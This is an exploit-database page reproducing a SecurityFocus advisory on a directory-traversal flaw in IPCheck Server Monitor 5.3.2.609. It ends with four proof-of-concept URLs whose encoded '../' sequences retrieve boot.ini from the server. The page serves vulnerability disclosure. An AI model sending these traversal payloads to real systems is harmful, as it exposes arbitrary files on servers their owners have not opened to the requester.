header-logo
Suggest Exploit
vendor:
IPCheck Server Monitor
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: IPCheck Server Monitor
Affected Version From: 5.3.2.609
Affected Version To: 5.3.2.609
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

IPCheck Server Monitor Directory Traversal Vulnerability

IPCheck Server Monitor is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19473/info

IPCheck Server Monitor is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.

IPCheck Server Monitor 5.3.2.609 is vulnerable; other versions may also be affected.

http://www.example.com:8080/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini http://www.example.com/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini http://www.example.com/images../..../..../..../..../..../..../..../..../..../..../..../boot.ini http://www.example.com/images/..%255c../..%255c../..%255c../..%255c../boot.ini